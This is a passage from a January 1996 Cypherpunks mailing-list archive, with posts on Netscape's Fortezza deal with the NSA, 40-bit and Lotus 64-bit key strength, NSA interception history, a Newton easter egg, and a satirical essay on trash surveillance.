     in the report it jointly prepared. 
 
 
  The newsstory reports 
 
     ...federal prosecutors dropped [the Zimmerman] investiga- 
     tion without explanation.... 
 
 
  No explanation's required.  One hostage was released.  13 
  others were taken.  But the one release does afford the new 
  hostages, who have deep pockets, some hope... 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The newsstory's headline?  COMMERCE'S BROWN 
  PROPOSES REWRITE OF ENCRYPTION EXPORT CONTROLS. 
  Its dateline?  WASHINGTON (Jan 12, 1996 5:34 p.m. EST). 
  Its Nando News online filename?  biz6_1893.html 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 20 Jan 1996 04:20:48 +0800
To: Rishab Aiyer Ghosh <rishab@m-net.arbornet.org>
Subject: Re: Netscape and NSA
In-Reply-To: <m0td0rd-0009PVC@m-net148.arbornet.org>
Message-ID: <30FF642C.400@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rishab Aiyer Ghosh wrote:
> 
> Any special reason why Netscape is working with
> the NSA to support their Fortezza encryption card?
> 
> ObConspiracyTheory: Hmmmmm....
> 
> Nice government-friendly Jim Clark quote, with the rest of the story
> http://www-e1c.gnn.com/gnn/wr/96/01/12/features/nsa/index.html

  Here is another quote for you:

	"Netscape will fight in all forums for totally private
	encryption." -- Jim Barksdale Netscape CEO

  One particularly interesting paragraph from the GNN article is:

	"One senior Federal Government source has reported that
	NSA has been particularly successful in convincing
	key members of the US software industry to cooperate
	with it in producing software that makes Internet
	messages easier for NSA to intercept, and if they are
	encrypted, to decode," Madsen wrote. "A
	knowledgeable government source claims that the NSA
	has concluded agreements with Microsoft, Lotus and
	Netscape to permit the introduction of the means to
	prevent the anonymity of Internet electronic mail, the use
	of cryptographic key-escrow, as well as software industry
	acceptance of the NSA-developed Digital Signature Standard (DSS)."

  I believe that the reference to Netscape in this paragraph is
a distortion of our agreement with the NSA.  They agreed to
buy some of our current products, which they paid for, and to
buy products in the future that support Fortezza.  Given the
large number of organizations within the government that are
standardizing on fortezza, our motivation for producing such
a product should be obvious.  I think in the end the non-NSA
purchases of Fortezza based products within the government
will be much larger than what the NSA buys.

  Once we have implemented Fortezza we would like to add support
for many alternative crypto cards that are not GAK'd and are more
apropriate for commercial or personal use.  We will also continue
to offer software encryption.

  Management here has never asked me not to implement anonymity
enhancing features.  They have not asked me to implement DSS.
They have not asked me to implement GAK.  Management has
let me hold up a release to fix a bug that was causing a
user's identity to be accessible from a server.  We have
awarded several bugs bounty prizes to people who found
bugs related to privacy.

  I understand that in his keynote speach at the RSA Security
Conference Jim Barksdale repeated our strong opposition to
GAK.  Perhaps someone who attended could provide more details.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 20 Jan 1996 20:43:58 +0800
To: <cypherpunks@toad.com>
Subject: [NOISE] FIG_newt/on CIA
Message-ID: <v03004800ad2538b7678a@[129.46.82.86]>
MIME-Version: 1.0
Content-Type: text/plain


[ This came to me from someone at Apple, through our pal Stephan Somogyi ]
[ ...another "your tax dollars hard at work" story... heh.    --dave     ]

................................. cut here .................................

There's an easter egg in the 2.0 Newton (MessagePad 120) which was
"censored" by, yes, the CIA.

Back in '94, one of the Newton software types make a trek to the (very)
small town of Rachel, Nevada, which is located at the edge of a secret
government airbase. The base, called "Area 51," is thought by
UFO-enthusiasts to be filled with alien technology which the government is
in the process of reverse engineering. Meanwhile, the government denies the
very existence of the base, in spite of widespread media coverage ("Larry
King Live from Area 51", etc.).

We figured it'd be funny to put a reference to Area 51 in the Newton --
especially given the substantial overlap between conspiracy buffs and
computer nerds. So, in the "Time Zones" application, contains a world map,
we put an entry for Area 51 in its correct location. Later, we added a
twist -- if the user picks Area 51 from the map, the icons in the datebook
application take on an alien theme. Normally, meetings are represented by
an icon of two people face-to-face, events are represented by a flag, etc.,
etc. But when Area 51 has been chosen, the icon for a meeting is a person
facing an alien, the icon for an event is a flying saucer, a to-do task is
represented by a robot, an so on.

Okay, cute enough. Now cut to August 1995, when the 2.0 ROM has been
declared final, seed units have been in customers' hands for a little
while, and the release is just about ready to go. One of the seed units, it
turns out, was sent to a cryptographer working for the CIA. When he found
that Area 51 was listed at the correct latitude/longitude, he complained to
Apple, demanding the removal of the easter egg and threatening to have his
superiors take the issue to Spindler if necessary. In the end, Newton
management caved in to the demand, and decided to pull the joke out of the
system.

But the ROM was already done -- so the feature was hidden by a software
patch ("System Update") -- but this part of the patch can itself be
removed, and "Area 51" returned to its rightful glory. Here's how to get
the easter egg back:

1) Open the Extras drawer.
2) Switch the folder of the Extras drawer to "Storage".
3) Tap on the icon "Time Zones" and press the "Delete" button.
   Warning -- any cities you've added to your Newton will be lost.
4) Switch the folder of the extras drawer back to "Unfiled icons."
5) Tap on "Time Zones."

You'll find that Area 51 is on the map -- just tap near Las Vegas and
choose Area 51 from the popup. Now look at the icons in Dates. (To purge
the aliens from your PDA, open the back and press reset).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "david d `zoo' zuhn" <zoo@armadillo.com>
Date: Fri, 19 Jan 1996 19:13:47 +0800
To: jirib@cs.monash.edu.au
Subject: Re: Ozzie Apes Jim Clark, Fix Is In to Cave and Cry
In-Reply-To: <199601190944.UAA17814@sweeney.cs.monash.edu.au>
Message-ID: <199601191106.FAA15561@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

//  I suppose it'll be safe for a while yet (esp. for session keys), but
//  has anyone multiplied that graphics-workstation-40bit price by 2^24?
//  It's only 10 billion! (billion=10^9) A lot of money, sure, but given
//  that it's not very expensive to go to 128 bits or more, why ???

Probably to satisfy the spirit of the proposed new export regulations that
require a max of 64 bits.  They would have to get US Gov't approval for
this workfactor-reduction export as well, so there could be additional
pressure applied to keep it to 64 bits.  What if the workfactor-reduction
bits got encrypted with a different key that the Gov't didn't have (via a
patch binary for example)?  Then the work is only 64 bits and not 128.

Given the size of the NSA budgets, the equipment to break 64 bits is almost
certainly available.  They'd probably much rather break 2^24 40 bit key
than 1 64 bit key, but they'll do what they have to in order to make sure
they can read the keys.

//  Now how about the percentage of *foreign* people who trust the US govt.?
//  Given that it has said that it'll spy commercially... (if memory
//  serves).

Memory serves me oppositely -- denial that it has done so in the past and
saying that they would not do so in the future.  This came a couple of
months ago during trade negotiations with the Japanese government.

- -- 
- -  david d `zoo' zuhn  -| armadillo zoo software -- St. Paul, Minnesota
- --  zoo@armadillo.com --|   unix generalist (and occasional specialist)
- ------------------------+   http://www.armadillo.com/ for more information
  pgp key upon request  +----------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMP97Cu80ah2ymxnRAQGquQP+LXaSHcPvbVfntcyw+f86am9fbyzWwITE
fpIl13Hp560BXFnF/gQCGt1a87aShEIqQbhkOEHTty2ORjOrGHExjxYWZTuZS/UI
JyfhN/n/0oi7yGHk5BSN31PtnFKU7JbLyBKAujaUvsmPGttz+8Hr+wZXhEwzJ4XA
Cl3OAO2AAAg=
=Npod
-----END PGP SIGNATURE-----

[ At home now, so it's signed...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 19 Jan 1996 22:26:13 +0800
To: cypherpunks@toad.com
Subject: NSA vacuuming down Internet traffic
Message-ID: <199601191410.JAA09163@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by nobody@REPLAY.COM (Anonymous) on Fri, 19 
Jan 10:23 AM


>In the 1960's - 1970's when international cable traffic 
>was in its computer infancy, access was had to EVERY 
>CABLE MESSAGE passing through the message switches of 
>U.S. common carriers.
>
>If anyone else wishes to move this from the status of 
>urban legend to something more solid, all they have to 
>do is locate and ask people who worked in message 
>switch operations at RCA Global Communications, ITT 
>World Communications, or Western Union International, 
>the three common carriers of that time.
>
>We Jurgar Din


Yes, indeed. James Bamford in "The Puzzle Palace" details the 
long-term TLA-access to international cable traffic -- via 
Operation Shamrock -- beginning in 1945 and ostensibly ending 
in 1975. See Chapter 6, "Targets."


Aside, in this chapter Bamford writes that Louis Tordella, who 
died earlier this week, "The Agency's chief keeper of the 
secrets," was central to targeting of thousands of Americans. 
Bamford says of Tordella, "If NSA was the darkest part of the 
government, Tordella was the darkest part of the NSA." Tordella 
allegedly shielded various NSA heads by not telling them what 
was going on -- to their great relief.


David Kahn in "The Codebreakers" more extensively examines the 
history of spying on citizens in the national interest. It will 
be interesting to read what he is currently researching at the 
more PR-oriented NSA -- and perhaps provide pointers to 
deep-blacker orgs that have supplanted it through non-FOIA 
arrangements like those of Shamrock.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Fri, 19 Jan 1996 23:23:05 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Single computer breaks 40-bit RC4 in under 8 days
In-Reply-To: <Pine.ULT.3.91.960118191503.25375E-100000@Networking.Stanford.EDU>
Message-ID: <55buo0z0bc.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> said:

>> workstations, Doligez averaged 850,000 keys per second.ICE used the
>> following formula to determine its $584 cost of computing power: the
>> total cost of the computer divided by the number of days in a
>> three-year lifespan (1,095), multiplied by the number of days (7.7)
>> it takes to break the code.

RG> This assumes, of however, that collecting encrypted communications,
RG> feeding them to the computer with 100% efficiency, electricity,
RG> labor, etc. are completely free.

RG> I hope everyone recognizes this as more old news and ICE
RG> marketing. In a fantasy world, the press et al would see this and
RG> clamor for the revocation of ITAR.

	This is old news to those of us who understand it.  But this new
way of presenting the information is newsworthy.  Yes, it
over-simplifies the costs of collecting the transactions to force, but
the sound bite nature of reporting today requires that.  The government
is trying to give people warm fuzzies about the 'security' of 40-bit
encryption, and we, unfortunately, need to be spreading FUD about that.
This helps to do that.

-- 
#include <disclaimer.h>				/* Sten Drescher */
1973 Steelers    About Three Bricks Shy of a Load    1994 Steelers
1974 Steelers         And the Load Filled Up         1995 Steelers?
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 20 Jan 1996 01:40:09 +0800
To: cypherpunks@toad.com
Subject: "cybertage"
Message-ID: <199601191722.JAA04520@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



how about a new term for all the various enemies of cyberspatial 
advancement? the censors, the luddites, the spooks, the politicians,
the demagogues, the rabid media (all of which there seems to be no 
shortage of lately):

"cyberteurs" engaging in "cybertage"

now if we can only get a strong stigma associated with the words and
label all the enemies with it. I think it could really stick. a sort
of reaction by cyberspatial citizens against all the encroachments
and disrespect.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@nyx.net (Alan Westrope)
Date: Sat, 20 Jan 1996 01:05:40 +0800
To: cypherpunks@toad.com
Subject: Denver area meeting, SUPER SUNDAY, Jan. 21, 2 pm
Message-ID: <tT8/wo9g/U8P085yn@nyx.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some locals will flout this most sacred of American holidays by
gathering to discuss crypto and ancillary issues at the Tivoli,
on the Auraria campus between Speer, Larimer, and the Auraria
Parkway.  If you're not sure of the location, send email for
Mo' Better Clues.

Alan Westrope     PGP public key:  http://www.nyx.net/~awestrop
<awestrop@nyx.net>
<awestrop@crl.com>
PGP 0xB8359639:   D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMP/JO1RRFMq4NZY5AQGfnAP/ajy9KYmsXp4G2hFO5AvKkahk/qIQEFPV
d9AZrTGylRDep+6jrDbdoOlr7BKEhRebwtweaupQ+fKCiVQQJvxlcCccaCfd11hD
D2okx9N1Q3KRhCgtk6fglkfZ6STDUF+maHUK83t7NclW41lp75uppwfZw//qVWr2
VreutUqu16I=
=QDzQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 19 Jan 1996 17:29:24 +0800
To: cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
Message-ID: <199601190919.KAA10339@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 15 Jan 96, Rich Graves wrote:

> But government employees should only be held accountable for 
> their actions as government employees. If the situation 
> warrants, go ahead and tap their offices, break into their work 
> computers, etc. But don't fuck with their personal lives.

Oh, my! A little sensitive, are we? Aren't you even a *little*
struck by the fact that fucking with people's personal lives 
is *precisely* what errant government officials *do*???

> Lots of people on this list have the power to carry out their
> own tyranny over both individuals and groups. All it takes in 
> today's fragile online world is a little specialized knowledge. 
> I don't think it's ethical to use this power without serious 
> thought. 

Some might opine that the reason we have so many abuses is that
so *few* people use the power they hold in their hands to set 
things right. Even the well-intentioned seem to expect someone 
*else* to do their maintenance of the republic for them.

> The line between government and non-government is increasingly 
> blurry anyway. 

That's part of The Game, Rich.  It makes it all that much easier 
for people to dismiss attempts at delineation by saying things 
like, oh, "The line between government and non-government is 
increasingly blurry anyway."

> Everybody gets something from the government, be it roads or an 
> education. 

Oh. Okay, then. That makes it OK for them to indict you to keep 
their statistics up. Works for me!

> Why should you be more suspicious of the guy getting paid 
> $10/hour to deliver your mail by the government than the 
> private businessman getting millions of dollars in government 
> subsidies? 

I'm not. Maybe *you* should be more suspicious of the guy getting
paid $100K of direct government money to manage a national 
campaign of low-key terror than you should of the private 
businessman unable to pay himself because he *must* pay his 
employees and the government doesn't leave him enough for his 
own paycheck. This last is a *lot* more common than the "private 
businessman getting millions of dollars in government subsidies."

> I think we're fundamentally asking the wrong question. I only 
> see relative power. I'd estimate that Bill Gates is more 
> powerful than Fidel Castro in  many respects. He's certainly a 
> lot more powerful than your average postal clerk. 

"Looking for pow'r... in all the wrong places, (la-tee-dah)..."
Admit it, Rich, you only see harmful power where you want to see 
it, and that isn't in government -- it is in private hands, 
particularly *corporate* hands. Geez, but you'd think that 
left-handed university cookie cutter would have gotten dulled and 
broken by now, and that they'd have fashioned a new one.

I'd estimate that the Postmaster General is more powerful than 
Fidel Castro in many respects. He's certainly a lot more powerful 
than your average private businessman.

>  P.S. For the Good of the Order, I'm temporarily ignoring 
>  jimbell

That's quite all right. We can be sure he won't ignore *you*.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMP9aREjw99YhtpnhAQG1ggIAhKmRWWIAIxCrmBemK79MDnnvko2Y+ooj
i2GoxrHhDC9cr98O45iEdo+spcVETbMryvVgf3i4MCRr7t2iRwoRxQ==
=nMvR
-----END PGP SIGNATURE-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 19 Jan 1996 17:39:57 +0800
To: cypherpunks@toad.com
Subject: NSA vacuuming down Internet traffic
Message-ID: <199601190923.KAA10526@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WRT:

    "...the same article had Madsen stating that the NSA is 
    vacuuming down Internet traffic. he gave the likely entry 
    points that they are doing this."

It's a virtual lead-pipe cinch that this is being done and
probably has been going on for longer than anyone would like to 
think.

In the 1960's - 1970's when international cable traffic was in 
its computer infancy, access was had to EVERY CABLE MESSAGE 
passing through the message switches of U.S. common carriers.
This means no only every international cable message originating 
from or destined to a U.S. point, but also included every message 
ROUTED THROUGH the U.S., such as Europe <--> South America. 

There was no great skullduggery involved -- the common carriers 
simply made copies of their own log tapes and handed them to 
messengers from the, ah, FCC (ahem). It was on the operations 
checklist and no one thought twice about it. It may be urban 
legend to some, but I've seen it with my own eyes, handled the 
tapes with my own hands. 

If anyone else wishes to move this from the status of urban 
legend to something more solid, all they have to do is locate and 
ask people who worked in message switch operations at RCA Global 
Communications, ITT World Communications, or Western Union 
International, the three common carriers of that time.

Knowing this, I would assume something similar was done at 
overseas locations of the same carriers and at such other access 
points as could be compromised. An organization such as NSA that 
viewed this as SOP would have to be brain dead not to be doing
the same thing with the Internet. The only question in my mind is 
how far they have gone beyond USENET and the newer, fertile 
ground of web sites. Are they vacuuming packets and reassembling 
email? Just how many laser discs have been filled with coherent 
traffic?

Time to exercise those plain, brown envelopes.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMP9XX0jw99YhtpnhAQEH1gH+KiIxJ3eXZCNGq5mG9UB1A68+TOLe9tCk
NG170tzIBtwjlXw09B83Oxx16WineBqlZ7NJJiRazssBpFqDnWEh4A==
=tUWW
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 19 Jan 1996 19:16:17 +0800
To: cypherpunks@toad.com
Subject: Indecent Trash
Message-ID: <199601190944.KAA10937@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 10 Jan 96 at 10:42, t byfield wrote:

> At 10:26 PM 1/9/96, Alexander 'Sasha' Chislenko wrote:
> 
> >- Landfills:  They are probably the richest source of detailed 
> >   historical information that is not obtainable from any 
> >   other source and can be used to reconstruct the detailed 
> >   history of society, economy, technology and any single 
> >   person with incredible detail.

> I ain't holding my breath until someone develops a search 
> engine for Fresh Kills.

I can see it now... about the time that Grandson of Altavista 
finally yields a URL for Jimmy Hoffa's body in some dump 
somewhere the government will have figured out that it's so 
much simpler to catalog the stuff on the way IN, when all the 
artifacts are fresh and unmixed. While we're all watching what 
the government does to intercept packets, they will be routing 
*trash* packets through mysterious "garbage routers."  

As the stink grows stronger, someone will conceive of anonymous 
trash forwarders. They will accept unidentified trash, no 
questions asked, anonymize it with random DNA and fingerprint 
whorls, and sneak it into public trash receptacles. DNA 
generators will enable the mischievous to plant fabricated 
indications that Hillary did indeed have something going with 
Vince, the late Khomeini (hey, hard is hard, right?) as well as 
legions of four-footed friends, confirming the suspicions of 
multitudes.

As the piles of trash-based data grow, some Senator from
Nebraska will sound the alarm that kids are too easily exposed
to the indecent signs of private behavior retrievable on the
Net and will propose draconian measures to hold everyone
responsible for their contributions to the city landfill. 
Public receptacles will be closed. Trash will only be collected 
from registered Identifed Surplus Providers (ISP's). $250,000 
fine for disposing of a condom in a dump accessible from the 
Internet... 10 years in prison for carelessly tossing those 
nasty Polaroids in the kitchen compactor. The trash of the world
will have to be made safe for kids to view.

Everything will be a lot easier to trace and control if the
garbage input is fully identified. Barcodes on trash bags
might do for starters. Access to the garbage system might have
to be restricted to those 18 and over. Trash collectors could
be made responsible for content, drafting them without pay into
the ranks of the trash police. People could be encouraged to
report suspicious trash, and trash-related activities like
neighbors sneaking out at night to place an innocent-looking
compactor bag down the block with someone else's trash.  

For their own protection, youngsters might be required to retain 
all their garbage until age 18 and then, in a solemn ceremony 
worthy of the true significance of coming of age, pitch it all 
(duly anonymized to prevent abuse of minor indiscretions) from 
their new position as lawful participants in the world garbage 
system, friends and well-wishers trying to applaud and hold their 
noses at the same time (try it -- if you're not careful you can 
break your own nose, but hey, that'll work, too!). Who knows? 
Maybe Heinlein's advocacy of keeping kids in a barrel and feeding 
them through a hole until age 18 will enjoy resurgence among the 
compulsively protective while the Web meanwhile will provide real 
time underground data on Heinlein's rpm rate.

Protecting the trash of youth will, however, give rise to the 
hiding of adult trash among that of the underaged. The government
will have to root out offenders and "impute" suspicious trash 
to the parents. Those with no visible source of trash will of 
course be suspect, and will have to emit innocent trash to 
cover themselves. This will give rise to the practice of "trash 
laundering," in which agents convert nasty trash to innocuous 
trash that may then be tossed into any monitored, controlled 
channels with no repercussions.

Trash laundering will become a grave offense to the 
accompaniment of government and Ad Council PSA's and free 
brochures from Pueblo, Colorado. Blatant offenders who have 
fled to foreign climes will be kidnapped, some will be tortured,
because the War Against Filth will be a moral commitment of the 
national body. Foreign governments headed by suspected trash 
traffickers will be toppled in quickie invasions, their leaders 
brought back in chains to disappear into federal dungeons. Public 
debate will center on the legalities and rationalizations of 
using the military in policing domestic trash, while agencies 
such as the FBI cry for more budget to fight the scourge that 
threatens the decency of the nation's repositories.

Control of trash will spread inevitably to control of liquid 
wastes, whereupon a terrible discovery will be made: Everyone, 
but everyone, emits unspeakable bodily products. At that point 
the government will have no choice but to reluctantly declare 
everyone an outlaw and execute the populace.

It's all as logical as what happens when you introduce division 
by zero way down at the bottom of the complex equation where it 
isn't so noticeable.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMPS/PEjw99YhtpnhAQH1UQH5AdXBd7AvG6xT7x/cTXf5W1cAUXzoJ+GB
N0/SPrdoJnbUSN5LkJDwoVwA/eiL6/LVN9CjtmQwmydyBysM7M/7Xw==
=q+CF
-----END PGP SIGNATURE-----










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 20 Jan 1996 01:21:01 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape and NSA
In-Reply-To: <30FF642C.400@netscape.com>
Message-ID: <199601191702.LAA12547@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Let's not get carried away here.

Netscape's done a lot for privacy, and every indication we have is that
they'll continue to do so.  They've introduced strong crypto to the
consumer software market for the first time.  Giving users control over CAs 
says a lot about where Netscape is coming from -- it's an obscure thing 
for which there was no public demand, and which might hurt Netscape's 
position by opening up the market to competitors.  But it destroys the 
choke point which would have made it possible to impose GAK.

Our interests and Netscape's interests coincide.  Netscape needs to export
strong crypto to be competitive in the global marketplace.  As a 
consequence, Netscape has been making public statements pushing for 
unrestricted exports of strong crypto.  I have no doubt that they're 
pushing hard for the same thing in private discussions with government 
officials.

Where do people think things like the recent statements from Ron Brown
come from?  Big companies -- like Netscape -- have ongoing dialogues with
the Commerce Department, and apparently they've been pushing for exports. 
In and of itself that statement wasn't much -- nothing has changed.  But
it's a sign that the tide is turning.  Parts of the government are
starting to admit that we're right, and that giving people free access to 
strong crypto is in everyone's best interest.  That's important.

But at the same time, it's important for companies like Netscape and 
Lotus to know that we'll do everything we can to make it painful to back 
down on these issues.  What Lotus is doing is wrong, and we have to do 
whatever we can to make their decision painful to them.  It's absolutely 
essential that we do whatever we can to make the right decision less 
painful than the wrong one.

We don't have a lot of options in terms of strategy.  An immediate,
strong, and strident negative reaction may not be the best weapon 
imaginable, but it's one of the only ones we've got.  To those of you who 
work for these companies, and who are pushing for what's right -- don't 
take it personally.  We have to do it.

The Lotus approach is totally unacceptable.  A 64 bit key is only a 40 bit
key when your opponent already has 24 bits, and a 40 bit key just isn't
good enough.  But Lotus' plan is much worse than another plan which only
provides 40 bits of security.

Anything that involves government storehouses of keys is extremely
dangerous.  Lotus is doing everyone a big disservice when they pretend
that this is a step forward.  It's gak, and it's not just a proposal
anymore -- it's real this time.  This is the first wave of guys hitting
the beach.

Netscape is never going to convince everyone that they're on the right
side.  Some people will never trust a large company, no matter who works
there or what the company does.  But by widening the scope of its public 
efforts on behalf of privacy, Netscape could generate a lot of good will 
and do a lot of good for its own interests (and its bottom line) as well.

It would be good for everyone if Netscape took a more aggressive political
stand for free access to strong crypto.  How?  Expand the crypto coverage
on Netscape's web server.  Hire a full time person to write about crypto
technology and issues.  Put a link to the site on the Netscape home page. 
Netscape's home page links are the most visible on the net -- use them. 
Get together with companies like Sun and Microsoft to form a lobbying and
publicity organization similar to the Tobacco Institute.  (I know that's a
bad example -- many people think the Tobacco Institute is an evil
organization.  But it's a good tactic.)

I'm personally a little frustrated by the timidity of industry's 
response.  I don't understand it.  Netscape's interests are clear, their 
voice is loud, and their resources are vast.  Where's John D. Rockefeller 
when you need him?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jwa@nbs.nau.edu (James W. Abendschan)
Date: Sat, 20 Jan 1996 02:21:21 +0800
To: cypherpunks@toad.com
Subject: Re: "cybertage"
In-Reply-To: <vznuri@netcom.com>
Message-ID: <199601191805.LAA16786@ecosys.nbs.nau.edu>
MIME-Version: 1.0
Content-Type: text/plain


Way back on Jan 19,  9:22am, "Vladimir Z. Nuri" wrote:
> how about a new term for all the various enemies of cyberspatial 
> advancement? the censors, the luddites, the spooks, the politicians,
> the demagogues, the rabid media (all of which there seems to be no 
> shortage of lately):
> 
> "cyberteurs" engaging in "cybertage"

Augh!  No!  No more "cyber" anything, please!  Instead, how about
a filter (implemented at some key top-level, NSA-funded routers,
of course) that simply s/cyber//g ?

- - -

How "tight" is the encryption that ssh (secure shell) uses?  I'm
trying to push it for use across potentially insecure subnets
at our University, and would like all the ammo I can get :) 

Has anyone tried to sniff & brute force a ssh-encrypted session?

James


-- 
James W. Abendschan                                     Email: jwa@nbs.nau.edu
UNIX Systems Programmer/Administrator                   Voice: (520) 556-7466
Colorado Plateau Research Station, Flagstaff, AZ        FAX:   (520) 556-7500 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 20 Jan 1996 00:25:15 +0800
To: cypherpunks@toad.com
Subject: FAT_bet
Message-ID: <199601191611.LAA12645@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Saturday The Wash Post reported on the spies of many
   stripes invading Bosnia to strut stuff and ward off
   extinction. Today, TWP and NYT cover an IC briefing
   yesterday -- prompted by the Post story -- on the campaign
   of global spying cooperation to survive liposuction.


   FAT_bet  (the 3 articles)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jan 1996 02:43:42 +0800
To: cypherpunks@toad.com
Subject: Economic Surveillance, the NSA, and the 40+24 Lotus Position
Message-ID: <ad251960000210041a20@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[Note: Once again, could I suggest that people take the effort to trim the
distribution list? I've trimmed out the several names getting separate
copies.]


At 11:06 AM 1/19/96, david d `zoo' zuhn wrote:

>//  Now how about the percentage of *foreign* people who trust the US govt.?
>//  Given that it has said that it'll spy commercially... (if memory
>//  serves).
>
>Memory serves me oppositely -- denial that it has done so in the past and
>saying that they would not do so in the future.  This came a couple of
>months ago during trade negotiations with the Japanese government.


I don't think anything is resolved on this "economic espionage" issue. I've
been interested in this topic since around 1988 (for an unfinished novel I
was working on then--don't ask).

Here are a few misc. points:

* There is direct information that business information was intercepted by
the NSA and other SIGINT agencies and used by the U.S. for economic
advantage. This goes back to the 1940s, with intercepts of ITT and other
cable traffic, and continues up to the present. Bamford gives a bunch of
examples.

* However, there is no direct knowledge that I am aware of that
non-DOD-linked companies (i.e., ordinary American companies) received
significant amounts of economic intelligence on their competitors. Thus, I
doubt that General Motors was fed production data on Nissan that NSA
plucked out of the ether in its Japanese listening posts (such as the huge
NSA SIGINT facility at Misawa). Some companies may have received selected
intercepts, sub rosa, but I doubt that this was a matter of regular policy.

* Reports came out in the last couple of years that the NSA aided the U.S.
trade negotiators in talks with Japan by providing intercepts covering the
Japanese trade position. (I'm not sure if this was denied by the
Administration, or acknowledged, or what. But it's pretty likely to be
true. This is of course a different type of economic intelligence than
helping individual American companies, though the effects are similar.)

* Over the past 5-7 years there have been noises coming out of the
intelligence community about redefining their mission to include economic
espionage of various sorts (from the type they have always done, as above,
to more direct aid to American industry). I first heard comments on this
circa 1990, and they may have even come from a current or former DIRNSA...I
can't recall. (I took meticulous notes on what I was reading in the press,
but these notes are squirrelled away in "Tornado Notes" (Info Select) on an
old Toshiba laptop!)

* Shifting to more active economic intelligence gathering has *NOT* been
announced as a new mission for the NSA, despite rumors here on the
Cypherpunks list. If anyone can show us a real statement, or a plausible
report that deduces this to be a new mission, I would be grateful. Rather,
what I think we've been hearing are a bunch of reports and rumors that such
a shift is being considered.

(One list member contacted me by phone when I expressed similar doubts,
some months back, and offered to put me in touch with a friend of his who
claims to have evidence that such a shift has occurred. Not being an
investigative reporter, and not being in the Beltway, I declined.)

* Having said all this, that a certain type of economic surveillance and
espionage is unlikely (e.g., Intel isn't being informed of Japanese chip
yields), certainly other types of surveillance of foreign companies is
likely. The NSA and its affiliated agencies are of course likely to surveil
Western companies for evidence of arms shipments to other countries (a la
Toshiba's propeller-quieting technology shipped the U.S.S.R., France's
